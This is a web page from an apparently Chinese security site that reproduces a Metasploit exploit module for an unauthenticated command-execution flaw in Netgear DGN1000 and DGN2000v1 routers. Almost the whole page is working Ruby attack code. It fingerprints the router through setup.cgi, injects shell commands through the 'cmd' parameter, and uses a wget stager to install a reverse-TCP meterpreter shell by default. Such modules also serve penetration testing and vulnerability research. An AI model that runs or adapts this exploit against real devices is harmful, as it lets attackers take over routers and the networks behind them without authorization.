Netgear DGN1000 Setup.cgi Remote Command Execution

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Netgear DGN1000 Setup.cgi Remote Command Execution

来源：metasploit.com 作者：Mumbai 发布时间：2017-10-25

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',
      'Description' => %q{
        This module exploits an unauthenticated OS command execution vulneralbility
        in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and
        DGN2000v1 models.
        },
      'Author' => [
        'Mumbai <https://github.com/realoriginal>', # module
        'Robort Palerie <roberto@greyhats.it>' # vuln discovery
      ],
      'References' => [
          ['EDB', '25978'],
      ],
      'DisclosureDate' => 'Jun 5 2013',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSBE,
      'DefaultTarget' => 0,
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
      },
      'Privileged' => true,
      'Payload' => {
        'DisableNops' => true,
      },
      'Targets' => [[ 'Automatic', {} ]],
    ))
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => '/setup.cgi',
        'method' => 'GET'
        })
      if res && res.headers['WWW-Authenticate']
        auth = res.headers['WWW-Authenticate']
        if auth =~ /DGN1000/
          return Exploit::CheckCode::Detected
        end
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Connecting to target...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
    end

    print_status("#{peer} - Exploiting target ....")
    execute_cmdstager(
      :flavor => :wget,
      :linemax => 200,
      :concat_operator => " && "
    )
  end

  def execute_command(cmd, opts)
    begin
      res = send_request_cgi({
        'uri' => '/setup.cgi',
        'method' => 'GET',
        'vars_get' => {
          'next_file' => 'netgear.cfg',
          'todo' => 'syscmd',
          'cmd' => cmd.to_s,
          'curpath' => '/',
          'currentsetting.htm' => '1'
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告